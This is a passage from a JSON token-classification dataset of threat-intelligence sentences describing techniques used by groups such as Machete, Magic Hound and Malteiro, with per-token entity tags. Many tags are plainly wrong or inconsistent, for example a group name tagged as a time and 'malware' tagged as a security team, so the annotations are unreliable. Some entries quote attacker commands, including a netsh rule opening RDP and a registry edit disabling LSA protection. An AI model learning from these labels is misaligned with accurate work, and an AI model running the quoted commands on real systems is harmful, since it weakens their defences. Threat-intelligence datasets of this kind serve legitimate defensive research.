"B-Tool", "B-Tool", "O", "O" ] }, { "tokens": [ "LuminousMoth", "has", "hosted", "malicious", "payloads", "on", "Dropbox." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "LuminousMoth", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Machete", "has", "distributed", "Machete", "through", "a", "fake", "blog", "website." ], "ner_tags": [ "B-Idus", "O", "O", "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "relied", "on", "users", "opening", "malicious", "attachments", "delivered", "through", "spearphishing", "to", "execute", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "has", "relied", "on", "users", "opening", "malicious", "links", "delivered", "through", "spearphishing", "to", "execute", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Machete's", "Machete", "MSI", "installer", "has", "masqueraded", "as", "a", "legitimate", "Adobe", "Acrobat", "Reader", "installer." ], "ner_tags": [ "B-Idus", "B-Idus", "O", "I-Tool", "O", "O", "O", "O", "O", "I-Tool", "O", "B-Tool", "O" ] }, { "tokens": [ "Machete", "has", "used", "msiexec", "to", "install", "the", "Machete", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "Machete", "used", "multiple", "compiled", "Python", "scripts", "on", "the", "victim’s", "system.", "Machete's", "main", "backdoor", "Machete", "is", "also", "written", "in", "Python." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "created", "scheduled", "tasks", "to", "maintain", "Machete's", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "Machete", "has", "delivered", "spearphishing", "emails", "that", "contain", "a", "zipped", "file", "with", "malicious", "contents." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "sent", "phishing", "emails", "that", "contain", "a", "link", "to", "an", "external", "server", "with", "ZIP", "and", "RAR", "archives." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "embedded", "malicious", "macros", "within", "spearphishing", "attachments", "to", "download", "additional", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Machete", "has", "used", "batch", "files", "to", "initiate", "additional", "downloads", "of", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "added", "a", "user", "named", "DefaultAccount", "to", "the", "Administrators", "and", "Remote", "Desktop", "Users", "groups." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Org", "B-Purp", "I-Org", "O" ] }, { "tokens": [ "Magic", "Hound", "granted", "compromised", "email", "accounts", "read", "access", "to", "the", "email", "boxes", "of", "additional", "targeted", "accounts.", "The", "group", "then", "was", "able", "to", "authenticate", "to", "the", "intended", "victim's", "OWA", "(Outlook", "Web", "Access)", "portal", "and", "read", "hundreds", "of", "email", "communications", "for", "information", "on", "Middle", "East", "organizations." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "I-Area", "I-Area", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "has", "used", "IRC", "for", "C2." ], "ner_tags": [ "O", "O", "B-Tool", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "gzip", "to", "archive", "dumped", "LSASS", "process", "memory", "and", "RAR", "to", "stage", "and", "compress", "local", "folders." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "can", "use", "a", "SOAP", "Web", "service", "to", "communicate", "with", "its", "C2", "server." ], "ner_tags": [ "O", "O", "B-SecTeam", "O", "O", "O", "B-Way", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "removed", "mailbox", "export", "requests", "from", "compromised", "Exchange", "servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "base64-encoded", "commands." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "gathered", "credentials", "from", "two", "victims", "that", "they", "then", "attempted", "to", "validate", "across", "75", "different", "websites.", "Magic", "Hound", "has", "also", "collected", "credentials", "from", "over", "900", "Fortinet", "VPN", "servers", "in", "the", "US,", "Europe,", "and", "Israel." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "B-Area", "O", "B-Area" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "BitLocker", "and", "DiskCryptor", "to", "encrypt", "targeted", "workstations." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "a", "web", "shell", "to", "exfiltrate", "a", "ZIP", "file", "containing", "a", "dump", "of", "LSASS", "memory", "on", "a", "compromised", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "enabled", "and", "used", "the", "default", "system", "managed", "account,", "DefaultAccount,", "via", "`\"powershell.exe\"", "/c", "net", "user", "DefaultAccount", "/active:yes`", "to", "connect", "to", "a", "targeted", "Exchange", "server", "over", "RDP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Magic", "Hound", "has", "collected", "location", "information", "from", "visitors", "to", "their", "phishing", "sites." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "executed", "scripts", "to", "disable", "the", "event", "log", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "added", "the", "following", "rule", "to", "a", "victim's", "Windows", "firewall", "to", "allow", "RDP", "traffic", "-", "`\"netsh\"", "advfirewall", "firewall", "add", "rule", "name=\"Terminal", "Server\"", "dir=in", "action=allow", "protocol=TCP", "localport=3389`." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "disabled", "antivirus", "services", "on", "targeted", "systems", "in", "order", "to", "upload", "malicious", "payloads." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Features", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "domain", "administrator", "accounts", "after", "dumping", "LSASS", "process", "memory." ], "ner_tags": [ "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "a", "web", "shell", "to", "execute", "`nltest", "/trusted_domains`", "to", "identify", "trust", "relationships." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "registered", "fraudulent", "domains", "such", "as", "\"mail-newyorker.com\"", "and", "\"news12.com.recover-session-service.site\"", "to", "target", "specific", "victims", "with", "phishing", "attacks." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "compromised", "domains", "to", "host", "links", "targeted", "to", "specific", "phishing", "victims." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "conducted", "watering-hole", "attacks", "through", "media", "and", "magazine", "websites." ], "ner_tags": [ "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "B-Idus", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "Powershell", "to", "discover", "email", "accounts." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "compromised", "personal", "email", "accounts", "through", "the", "use", "of", "legitimate", "credentials", "and", "gathered", "additional", "victim", "information." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "established", "email", "accounts", "using", "fake", "personas", "for", "spearphishing", "operations." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "identified", "high-value", "email", "accounts", "in", "academia,", "journalism,", "NGO's,", "foreign", "policy,", "and", "national", "security", "for", "targeting." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "B-Way", "O", "O", "B-Idus", "B-Idus", "B-OffAct", "I-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "compromised", "email", "credentials", "in", "order", "to", "steal", "sensitive", "data." ], "ner_tags": [ "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "an", "encrypted", "http", "proxy", "in", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "has", "used", "base64-encoded", "files", "and", "has", "also", "encrypted", "embedded", "strings", "with", "AES." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "the", "Telegram", "API", "`sendMessage`", "to", "relay", "data", "on", "compromised", "devices." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "exploited", "the", "Log4j", "utility", "(CVE-2021-44228),", "on-premises", "MS", "Exchange", "servers", "via", "\"ProxyShell\"", "(CVE-2021-34473,", "CVE-2021-34523,", "CVE-2021-31207),", "and", "Fortios", "SSL", "VPNs", "(CVE-2018-13379)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Way", "B-Features", "B-Features", "B-Features", "O", "B-SamFile", "B-SecTeam", "B-SecTeam", "B-Features" ] }, { "tokens": [ "Magic", "Hound", "has", "deleted", "and", "overwrote", "files", "to", "cover", "tracks." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "can", "list", "a", "victim's", "logical", "drives", "and", "the", "type,", "as", "well", "the", "total/free", "space", "of", "the", "fixed", "devices.", "Other", "malware", "can", "list", "a", "directory's", "contents." ], "ner_tags": [ "O", "O", "B-SecTeam", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Magic", "Hound", "has", "acquired", "mobile", "phone", "numbers", "of", "potential", "targets,", "possibly", "for", "mobile", "malware", "or", "additional", "phishing", "operations." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "has", "a", "function", "to", "determine", "whether", "the", "C2", "server", "wishes", "to", "execute", "the", "newly", "dropped", "file", "in", "a", "hidden", "window." ], "ner_tags": [ "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "captured", "the", "IP", "addresses", "of", "visitors", "to", "their", "phishing", "sites." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "disabled", "LSA", "protection", "on", "compromised", "hosts", "using", "`\"reg\"", "add", "HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA", "/v", "RunAsPPL", "/t", "REG_DWORD", "/d", "0", "/f`." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "downloaded", "additional", "code", "and", "files", "from", "servers", "onto", "victims." ], "ner_tags": [ "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "conducted", "a", "network", "call", "out", "to", "a", "specific", "website", "as", "part", "of", "their", "initial", "discovery", "activity." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "Magic", "Hound", "malware", "is", "capable", "of", "keylogging." ], "ner_tags": [ "O", "O", "B-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Magic", "Hound", "has", "stolen", "domain", "credentials", "by", "dumping", "LSASS", "process", "memory", "using", "Task", "Manager,", "comsvcs.dll,", "and", "from", "a", "Microsoft", "Active", "Directory", "Domain", "Controller", "using", "Mimikatz." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Magic", "Hound", "has", "copied", "tools", "within", "a", "compromised", "network", "using", "RDP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Magic", "Hound", "has", "created", "local", "accounts", "named", "`help`", "and", "`DefaultAccount`", "on", "compromised", "machines." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "collected", ".PST", "archives." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "attempted", "to", "lure", "victims", "into", "opening", "malicious", "email", "attachments." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "attempted", "to", "lure", "victims", "into", "opening", "malicious", "links", "embedded", "in", "emails." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Magic", "Hound", "has", "named", "a", "malicious", "script", "CacheTask.bat", "to", "mimic", "a", "legitimate", "task." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "`dllhost.exe`", "to", "mask", "Fast", "Reverse", "Proxy", "(FRP)", "and", "`MicrosoftOutLookUpdater.exe`", "for", "Plink." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Tool", "B-HackOrg", "B-HackOrg", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Magic", "Hound", "has", "modified", "Registry", "settings", "for", "security", "tools." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "KPortScan", "3.0", "to", "perform", "SMB,", "RDP,", "and", "LDAP", "scanning." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Magic", "Hound", "malware", "has", "communicated", "with", "its", "C2", "server", "over", "TCP", "ports", "4443", "and", "10151", "using", "HTTP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "PowerShell", "for", "execution", "and", "privilege", "escalation." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "can", "list", "running", "processes." ], "ner_tags": [ "O", "O", "B-SecTeam", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "Plink", "to", "tunnel", "RDP", "over", "SSH." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "Fast", "Reverse", "Proxy", "(FRP)", "for", "RDP", "traffic." ], "ner_tags": [ "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "has", "used", "Registry", "Run", "keys", "to", "establish", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "Remote", "Desktop", "Services", "to", "copy", "tools", "on", "targeted", "systems." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "exported", "emails", "from", "compromised", "Exchange", "servers", "including", "through", "use", "of", "the", "cmdlet", "`New-MailboxExportRequest.`" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "Ping", "for", "discovery", "on", "targeted", "networks." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "rundll32.exe", "to", "execute", "MiniDump", "from", "comsvcs.dll", "when", "dumping", "LSASS", "memory." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "scheduled", "tasks", "to", "establish", "persistence", "and", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "can", "take", "a", "screenshot", "and", "upload", "the", "file", "to", "its", "C2", "server." ], "ner_tags": [ "O", "O", "B-SecTeam", "O", "I-Features", "I-Features", "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "created", "fake", "LinkedIn", "and", "other", "social", "media", "accounts", "to", "contact", "targets", "and", "convince", "them--through", "messages", "and", "voice", "communications--to", "open", "malicious", "links." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "captured", "the", "user-agent", "strings", "from", "visitors", "to", "their", "phishing", "sites." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "sent", "malicious", "URL", "links", "through", "email", "to", "victims.", "In", "some", "cases", "the", "URLs", "were", "shortened", "or", "linked", "to", "Word", "documents", "with", "malicious", "macros", "that", "executed", "PowerShells", "scripts", "to", "download", "Pupy." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "SMS", "and", "email", "messages", "with", "links", "designed", "to", "steal", "credentials", "or", "track", "victims." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "used", "various", "social", "media", "channels", "(such", "as", "LinkedIn)", "as", "well", "as", "messaging", "services", "(such", "as", "WhatsApp)", "to", "spearphish", "victims." ], "ner_tags": [ "O", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "has", "used", "a", "PowerShell", "command", "to", "check", "the", "victim", "system", "architecture", "to", "determine", "if", "it", "is", "an", "x64", "machine.", "Other", "malware", "has", "obtained", "the", "OS", "version,", "UUID,", "and", "computer/host", "name", "to", "send", "to", "the", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "gathers", "the", "victim's", "local", "IP", "address,", "MAC", "address,", "and", "external", "IP", "address." ], "ner_tags": [ "O", "O", "B-Tool", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "quser.exe", "to", "identify", "existing", "RDP", "connections." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Magic", "Hound", "malware", "has", "obtained", "the", "victim", "username", "and", "sent", "it", "to", "the", "C2", "server." ], "ner_tags": [ "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "obtained", "and", "used", "tools", "like", "Havij,", "sqlmap,", "Metasploit,", "Mimikatz,", "and", "Plink." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Magic", "Hound", "malware", "has", "used", "VBS", "scripts", "for", "execution." ], "ner_tags": [ "O", "O", "I-Tool", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "conducted", "widespread", "scanning", "to", "identify", "public-facing", "systems", "vulnerable", "to", "CVE-2021-44228", "in", "Log4j", "and", "ProxyShell", "vulnerabilities;", "CVE-2021-26855,", "CVE-2021-26857,", "CVE-2021-26858,", "and", "CVE-2021-27065", "in", "on-premises", "MS", "Exchange", "Servers;", "and", "CVE-2018-13379", "in", "Fortinet", "FortiOS", "SSL", "VPNs." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-Way", "B-Tool", "B-Features", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "acquired", "Amazon", "S3", "buckets", "to", "use", "in", "C2." ], "ner_tags": [ "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "multiple", "web", "shells", "to", "gain", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "collected", "names", "and", "passwords", "of", "all", "Wi-Fi", "networks", "to", "which", "a", "device", "has", "previously", "connected." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "the", "command-line", "interface", "for", "code", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Magic", "Hound", "has", "used", "a", "tool", "to", "run", "`cmd", "/c", "wmic", "computersystem", "get", "domain`", "for", "discovery." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malteiro", "has", "obtained", "credentials", "from", "mail", "clients", "via", "NirSoft", "MailPassView." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O" ] }, { "tokens": [ "Malteiro", "has", "stolen", "credentials", "stored", "in", "the", "victim’s", "browsers", "via", "software", "tool", "NirSoft", "WebBrowserPassView." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malteiro", "has", "the", "ability", "to", "deobfuscate", "downloaded", "files", "prior", "to", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Malteiro", "has", "injected", "Mispadu’s", "DLL", "into", "a", "process." ], "ner_tags": [ "B-Time", "O", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Malteiro", "has", "used", "scripts", "encoded", "in", "Base64", "certificates", "to", "distribute", "malware", "to", "victims." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malteiro", "targets", "organizations", "in", "a", "wide", "variety", "of", "sectors", "via", "the", "use", "of", "Mispadu", "banking", "trojan", "with", "the", "goal", "of", "financial", "theft." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Malteiro", "has", "relied", "on", "users", "to", "execute", ".zip", "file", "attachments", "containing", "malicious", "URLs." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Malteiro", "collects", "the", "installed", "antivirus", "on", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malteiro", "has", "sent", "spearphishing", "emails", "containing", "malicious", ".zip", "files." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Malteiro", "collects", "the", "machine", "information,", "system", "architecture,", "the", "OS", "version,", "computer", "name,", "and", "Windows", "product", "name." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malteiro", "will", "terminate", "Mispadu's", "infection", "process", "if", "the", "language", "of", "the", "victim", "machine", "is", "not", "Spanish", "or", "Portuguese." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "O", "B-Area" ] }, { "tokens": [ "Malteiro", "has", "utilized", "a", "dropper", "containing", "malicious", "VBS", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Metador", "has", "encrypted", "their", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Metador", "has", "quickly", "deleted", "`cbd.exe`", "from", "a", "compromised", "host", "following", "the", "successful", "deployment", "of", "their", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metador", "has", "downloaded", "tools", "and", "malware", "onto", "a", "compromised", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metador", "has", "used", "unique", "malware", "in", "their", "operations,", "including", "metaMain", "and", "Mafalda." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Metador", "has", "used", "TCP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { 